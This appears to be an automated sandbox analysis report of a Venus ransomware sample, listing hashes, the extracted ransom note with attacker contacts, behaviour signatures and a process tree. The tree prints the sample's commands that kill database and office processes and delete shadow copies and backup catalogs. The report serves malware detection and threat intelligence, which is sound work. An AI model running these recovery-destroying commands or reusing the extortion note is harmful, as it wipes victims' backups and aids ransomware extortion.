Analysis

  • max time kernel
    66s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    18/10/2022, 13:52

General

  • Target

    0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe

  • Size

    225KB

  • MD5

    eae3f9f84a8b6756db599963aa4f49d1

  • SHA1

    c40909226c102ceb3cf97e9037c590f1623af013

  • SHA256

    0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028

  • SHA512

    dddcee2f12c1a0d8f0dd9a95e4b8f0841519361880d280beab3befd4afcebdecc9b8a32b1aedb9b9f542a22f6dc7c00af3afff93a0dc588f80d6a292a5a96602

  • SSDEEP

    6144:pROGJmXiQwAP5GXJHcTV50DErd5xgTw7ozFz254W:pROYeiQwAIHLD6GcoxfW

Malware Config

Extracted

Path

C:\README.html

Ransom Note
<html><head><title>Venus</title><style type = "text/css">*{padding:0;margin:0}p{color:white}.f{background-color:#ff7c00;width:100%;margin-left:auto;margin-right:auto;height:100%}.c h1{color:white;line-height:80px}.r{word-break:break-all;float:left;width:100%;text-align:center}</style></head><body><div class="f"><div class="c"><h1 align="center">&lt;&lt;&lt;Venus&gt;&gt;&gt;</h1></div><div class="r"><p></br></br></br></br><strong>We downloaded and encrypted your data.</strong></br>Only we can decrypt your data.<br><strong>IMPORTANT!</strong><br> If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay.<br> In this case we will not be able to help you.<br>Do not play with files.</p><p>Do not rename encrypted files.<br>Do not try to decrypt your data using third party software, it may cause permanent data loss.<br>Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.</br>-----------------------------------------------------</br>Contact and send this file to us:<br><strong><br>email:[email protected]<br>tox:9DA3D60F51FB83B539BA0CC79B6D4BE83003F8E7A294B531B6EA05102486855ADEEFFF5A90C8<br>jabber:[email protected]</strong><br><br>VuXokCcRnGJ2yw1dZ6DSt2jUohdnWW8KeowQwBbwdk7wARjPe+d30uevttyHMflR cX9/hcqhmWo/pHxNWKV+d8L8knMWRqxHVV6fs7GhER9U7hUlT2z1gKh9G2XVCCwR 1jPkAGWhsMBySLy+O9iVwwFipgVOnbcXsa/yzQixONEkJtoHVkotigpAW7zTR7ez Ejsw7SmtkSVWf8s77lUtqn0D8PKHIaUWmBSSJ+bxYuXJeqT5LI2eiDDOOM+fS+FQ kfbddqrAIJrRXWqI8AjEjEvrQgkE33LR2XPwlffyMNufN1sTJ4YX0kF+0evJKTdW 8LIiKKcCHBvnQm2npEyZqmElCZSrBsacGVlc8HVK2qvuOqd1H2YM/f5nKam77uQK Ch8/DJAsFdWAMQJjPaD4Nuukk9HwynamHd/+wQSRou4698HrDtxR/894LzhtB3bW lSwk5/l7fnAqx5eQheyzbdWblVeFZUL5SX6nrAgbzLPSp1rz/cwfWGVMn280YeIX U5Z7ntHPXBoCPUSD1M9lFuLmRNTGNvY9jpslx/7iF/Nj3p06P2/hXh6GEkPirUTt eSJSHB7FZ4O6POr7E2jVqTo/aYkVpqh95U6XOE1nROEDkNECxFv2t14oBXQUoppv ZeXXPSKZPjEIo0+Q </p></div></body></html></html></body></html>
Emails

email:[email protected]

jabber:[email protected]

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\5415296051972527219.hta

Ransom Note
<<<Venus>>> We downloaded and encrypted your data.Only we can decrypt your data.IMPORTANT! If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay. In this case we will not be able to help you. Do not play with files. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.-----------------------------------------------------Contact and send this file to us: email:[email protected] tox:9DA3D60F51FB83B539BA0CC79B6D4BE83003F8E7A294B531B6EA05102486855ADEEFFF5A90C8 jabber:[email protected]
Emails

email:[email protected]

jabber:[email protected]

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 34 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe
    "C:\Users\Admin\AppData\Local\Temp\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4704
    • C:\Windows\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe
      "C:\Windows\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe" g g g o n e123
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Checks computer location settings
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3404
      • C:\Windows\System32\cmd.exe
        /C taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5060
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1688
      • C:\Windows\System32\cmd.exe
        /C wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5912
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:5964
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:5836
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {current} nx AlwaysOff
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:6384
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic SHADOWCOPY DELETE
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:6408
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5415296051972527219.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
          PID:6136
      • C:\Windows\System32\cmd.exe
        /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2616
        • C:\Windows\system32\PING.EXE
          ping localhost -n 3
          3⤵
          • Runs ping.exe
          PID:5068
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:6000
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:6108
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:1140
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4060

Network

MITRE ATT&CK Enterprise v6

Downloads

      • C:\Users\Admin\AppData\Local\Temp\5415296051972527219.hta

        Filesize

        1KB

        MD5

        5615aecd8f5c11fecc543deb66384921

        SHA1

        f4811e649046ad83a01ea3ba6552364cc2f8d72d

        SHA256

        77bd29533dca8a9406dae258a34f8ab934578757ba6f06e13b49c71396a6291b

        SHA512

        7ea9902fae33c73e5bc720d9fc8b58202283d2a17349b0a434cd3fb9da703a0e31fcdb023775d41505465c712a173e06068a7666f2d3777e2cd83f630da8d941

      • C:\Windows\0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028.exe

        Filesize

        225KB

        MD5

        eae3f9f84a8b6756db599963aa4f49d1

        SHA1

        c40909226c102ceb3cf97e9037c590f1623af013

        SHA256

        0a4e5832841ffff9f8d27ce8216d655c8743b682fff0f90dee6bd3ea83dec028

        SHA512

        dddcee2f12c1a0d8f0dd9a95e4b8f0841519361880d280beab3befd4afcebdecc9b8a32b1aedb9b9f542a22f6dc7c00af3afff93a0dc588f80d6a292a5a96602

      • memory/3404-140-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

      • memory/3404-141-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

      • memory/4704-132-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB